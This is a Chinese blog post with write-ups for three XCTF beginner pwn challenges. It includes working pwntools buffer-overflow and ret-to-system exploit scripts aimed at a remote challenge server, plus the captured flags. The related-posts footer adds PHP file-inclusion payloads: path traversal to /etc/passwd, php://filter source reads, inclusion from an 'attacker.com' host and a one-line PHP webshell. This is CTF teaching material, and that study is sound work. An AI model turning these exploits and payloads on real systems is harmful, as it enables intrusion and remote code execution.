XCTF hello_pwn level2 get_shell

最新推荐文章于 2024-06-18 09:20:41 发布
原创 最新推荐文章于 2024-06-18 09:20:41 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

博客内容涉及了缓冲区溢出的利用技巧,通过Python的pwn库远程连接目标服务器,并构造特定payload进行内存地址覆盖,以达到修改字符串的效果。在后续的示例中,展示了如何寻找并利用system函数地址和/bin/sh字符串来获取shell。最终,博客作者展示了不同场景下获取shell的方法及其过程。

hello_pwn

在这里插入图片描述
这里需要满足的条件是60016C处的字符串为nuaa
在这里插入图片描述

这里的话需要覆盖,从601068覆盖到6010CC即可,6010CC处用nuaa进行覆盖:

# coding:utf-8 
from pwn import * 
r = remote("111.200.241.244",57818)#远程连接
payload = 'a'*(0x6c-0x68)+ 'aaun'
r.recvuntil("lets get helloworld for bof\n")
r.sendline(payload)
r.interactive()

这里传输的时候需要用大端形式,然后传过去自动改成小端。
运行之后如下:
在这里插入图片描述

cyberpeace{0f872662550ea7d0823054365105d87d}

level2

在这里插入图片描述

在这里插入图片描述

观察后,找到system地址和\bin\sh字符串(这个需要作为参数传入),但是在传参数之前,需要先传入system函数的返回地址(返回地址任意传,因为最后你不会返回)
在这里插入图片描述

# coding:utf-8 
from pwn import * 
shell=0x0804A024
system=0x08048320
r = remote("111.200.241.244",64449)
payload = 'a'*(0x88)+ 'a'*4+p32(system)+p32(0)+p32(shell)
r.recvuntil("Input:\n")
r.sendline(payload)
r.interactive()

在这里插入图片描述
注意调用一个函数结束后一定要返回 p32(0)就是system函数的返回地址

cyberpeace{30ea1f1d9c3c6b055e9d01b9f99ae84a}

get_shell

在这里插入图片描述

# coding:utf-8 
from pwn import * 
r = remote("111.200.241.244",57561)
r.interactive()

直接连接上就行,我居然在本地打开,笑死我自己。。
在这里插入图片描述

cyberpeace{ee3fab14022014edbe117b7c6e1132fa}

2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1725
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
XCTF hello_pwn
prettyX的博客
06-09 372
先使用file查看 checksec
XCTF|PWN-get_shell-WP
l2645470582_的博客
07-30 292
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 1 3、该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,再按Ctrl+X,查看关键字符串"/bin/sh"的地址 "/bin/sh"地址:0x400574 3.3、 3.4 3.5 3.6 3.7 ...
XCTF 攻防世界 pwn新手题(get_shell)
weixin_43456810的博客
12-14 1613
XCTF 攻防世界 pwn新手题(get_shell) 这道题十分简单,题目描述说运行就能拿到shell,可以先用nc尝试连接一下题目场景给的地址,直接就连接上了: 然后,ls,cat flag直接就可以获取到flag了
XCTF PWN get_shell
prettyX的博客
06-12 362
基本信息 尝试运行 IDA F5 Exp from pwn import * p=remote('111.200.241.244',52682) p.interactive() 这道题... : )
攻防世界新手区刷题日记
Ching_jen的博客
02-22 1506
1、get_shell 打开题目,发现有一个题目场景,然后看题目描述说运行就能拿到shell,所以先运行一下,看看会发生什么,在虚拟机终端上输入nc+ip地址+ip端口(连接该网址),然后输入cat flag 发现运行一下flag就真的出来了。 2.CDfsb 这道题也给了一个题目场景,先尝试上面的方法将其运行一下,看看会发生什么 结果并不像上题这么直接,该题还给了一个附件,将其下载下来,先用...
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2594
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
pwn学习(1)攻防世界-hello_pwn(大小端存储/ELF文件)
m0_66039322的博客
08-25 447
最后结果: cyberpeace{f178d34680e278da75e4b40e9921da97}查看读入数据和比较数据的位置,会发现问题,他们是挨着的,且相差4个字节,0000000000601068是开始位置,中间的数据随便填充即可。
0x00 cg_pwn2XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 566
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
XYCTF2024-PWN-hello_world
sagic的博客
06-18 482
获取system bin_sh pop_rdi ret地址就可以编写payload。第一次栈溢出输出main函数的返回地址(libc地址)从d60开始到d88 需要泄漏0x28个字符才能泄漏。read以回车结束的话只需要0x27个字符。printf %s遇不到\00就会一直打印。第二次栈溢出获取getshell。动态调式获得libc地址。vmmap获取偏移量。
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 7084
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 2063
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
XCTF Guess
stepone4ward的博客
07-16 456
phar文件上传 随机数预测
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4524
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2933
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
攻防世界 pwn get_shell
shidonghang的博客
10-29 1449
get_shell 题目 netcat https://blog.youkuaiyun.com/weixin_43803070/article/details/90172443 https://www.jianshu.com/p/f3364b732982 过程 使用Kali LInux虚拟机 nc 111.198.29.45 32468 ls cat flag ...
【ADworld】Pwn--get_shell
VZZmieshenquan的博客
02-14 2537
Description: 运行就能拿到shell呢,真的 文件:https://adworld.xctf.org.cn/media/task/attachments/get_shell/get_shell Solution: 点击获取在线场景后会给nc链接,之后cat flag即可 Flag: xctf{0f156d10bc369c0208b76f5794b9b86d} ...
xctf攻防世界web新手练习区--write up
热门推荐
qq_43081170的博客
07-05 3万+
** 文章目录 ** view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开题目后显示FLAG is not here,而且题目描述提示鼠标右键不管用了。这时想到F12键打开开发者工具,查看器可以查看页面源代码。F12----查看器直接得到答案。 get post **题目描述:**X老师告诉小宁同学HTTP通常使用两种请求方法,你...
xctf web_php_include
最新发布
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寻梦&之璐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值